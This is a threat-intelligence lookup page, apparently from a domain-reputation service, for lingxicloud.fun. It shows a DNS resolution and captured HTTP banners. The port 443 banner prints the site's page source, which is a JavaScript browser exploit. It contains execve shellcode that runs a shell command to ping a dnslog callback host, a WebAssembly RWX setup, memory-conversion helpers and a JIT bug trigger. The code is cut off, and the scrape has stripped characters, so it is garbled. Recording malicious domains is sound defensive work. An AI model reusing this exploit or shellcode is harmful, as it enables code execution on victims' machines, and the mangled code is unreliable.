Help
RSS
API
Feed
Maltego
Contact
Domain > lingxicloud.fun
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2025-10-26
107.174.246.142
(
ClassC
)
Port 80
HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Tue, 08 Apr 2025 23:31:55 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveLocation: https://lingxicloud.fun/Strict-Transport-Securit html>head>title>301 Moved Permanently/title>/head>body>center>h1>301 Moved Permanently/h1>/center>hr>center>nginx/center>/body>/html>
Port 443
HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Apr 2025 23:31:55 GMTContent-Type: text/htmlContent-Length: 3651Last-Modified: Sat, 01 Mar 2025 11:45:03 GMTConnection: keep-aliveVary: Accept-EncodingETag: 6 html langen>head> meta charsetUTF-8> title>test/title>script> function gc() { for (var i 0; i 0x80000; ++i) { var a new ArrayBuffer(); } } let shellcode 0x6a,0x0b,0x58,0x99,0x52,0x66,0x68,0x2d,0x63,0x89,0xe7,0x68,0x2f,0x73,0x68,0x00,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x52,0xe8,0x23,0x00,0x00,0x00,0x70,0x69,0x6e,0x67,0x20,0x2d,0x63,0x20,0x34,0x20,0x61,0x30,0x35,0x61,0x36,0x32,0x39,0x63,0x2e,0x6c,0x6f,0x67,0x2e,0x64,0x6e,0x73,0x6c,0x6f,0x67,0x2e,0x73,0x62,0x73,0x2e,0x00,0x57,0x53,0x89,0xe1,0xcd,0x80; var wasmCode new Uint8Array(0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11); var wasmModule new WebAssembly.Module(wasmCode); var wasmInstance new WebAssembly.Instance(wasmModule); var main wasmInstance.exports.main; var bf new ArrayBuffer(8); var bfView new DataView(bf); function fLow(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(0, true)); } function fHi(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(4, true)) } function i2f(low, hi) { bfView.setUint32(0, low, true); bfView.setUint32(4, hi, true); return bfView.getFloat64(0, true); } function f2big(f) { bfView.setFloat64(0, f, true); return bfView.getBigUint64(0, true); } function big2f(b) { bfView.setBigUint64(0, b, true); return bfView.getFloat64(0, true); } class LeakArrayBuffer extends ArrayBuffer { constructor(size) { super(size); this.slot 0xb33f; } } function foo(a) { let x -1; if (a) x 0xFFFFFFFF; var arr new Array(Math.sign(0 - Math.max(0, x, -1))); arr.shift();
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]